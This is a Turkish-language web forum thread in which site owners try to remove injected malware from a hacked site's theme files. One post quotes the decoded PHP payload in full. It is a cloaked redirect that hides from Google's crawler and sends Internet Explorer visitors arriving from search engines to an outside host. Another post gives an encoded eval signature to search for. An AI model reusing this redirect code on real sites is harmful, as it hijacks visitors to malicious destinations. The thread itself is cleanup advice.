• 05-02-2014, 19:02:43
    #10
    Üyeliği durduruldu
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
        $referer=$_SERVER['HTTP_REFERER'];
        $uag=$_SERVER['HTTP_USER_AGENT'];
        if ($uag) {
            if (stristr($uag,"MSIE")){
                preg_match ("/msie ([0-9.]+)/i",$uag,$mv);
                if (isset($mv[1])){
                    $mv=str_replace(".","",$mv[1]);
                }
            }
            if(!preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])){
                if (stristr($uag,"MSIE") and $mv>=90){
                    if (stristr($referer,"yahoo.") or stristr($referer,"bing.") or preg_match ("/google\.(.*?)\/url\?sa/",$referer)) {
                        if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
                            header("Location: http://gsbncm.epac.to/");
                            exit();
                        }
                    }
                }
            }
        }
    }
    kodda yazan bu. gerisini buradak cıkartısınız sanırım.

    kolay gelsin
  • 05-02-2014, 19:07:16
    #11
    Üyeliği durduruldu
    Dizininizde
    Alıntı
    eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJ
    kodunu aratın, çıkan sonuçları temizleyin. Daha sonrasında dizini anti virüsten geçirin veya host sağlayıcınızdan destek alın.
  • 05-02-2014, 19:07:41
    #12
    Hepsini temizlemek çözüm olmayabilir.
    Hepsini temizledikten sonra .htaccess dosyasını kontrol edin muhakkak onda da vardır kod.
    Ayrıca shell yedeklemiş olabilirler dosyaları kontrol etmekte yarar var size tanıdık gelmeyen dosyaları silin
  • 05-02-2014, 19:46:01
    #13
    Üyeliği durduruldu
    Bu virüs ve shell taramasını nasıl yapabilirim ? bilginiz var mı
  • 05-02-2014, 20:16:08
    #14
    Üyeliği durduruldu
    shell taraması yapan toollar vardir açıkcası ben hic bilmiyorum. eger bu kodların hepsini bulup temizlemek istiyorsanız ve ssh erişiminiz varsa anahtar kelimeleriniz. grep, sed
  • 06-02-2014, 21:48:47
    #15
    Üyeliği durduruldu
    kodları temizledim. Bu gün yine eklenmiş.
  • 06-02-2014, 22:10:45
    #16
    Cavro adlı üyeden alıntı: mesajı görüntüle
    kodları temizledim. Bu gün yine eklenmiş.
    gel halledelim. Alp
  • 06-02-2014, 22:57:27
    #17
    Üyeliği durduruldu
    barano adlı üyeden alıntı: mesajı görüntüle
    gel halledelim. Alp
    tamam
  • 07-02-2014, 00:23:44
    #18
    Cavro adlı üyeden alıntı: mesajı görüntüle
    tamam

    Alp Arkadaşımın Sunucusunda Maldet Taraması Temiz çıktı. Arkadaşlar

    Arkadaşımın yedeğini indirip. ESET Endpoint 'ile taratdıgımda

    Base64 iframe Virüsü ortaga çıktı. Bu Tema dosyasında



    Kodları Silsem Yeter li olurmu ? yada Nasıl yol izlemeliyiz ?

    Saygılar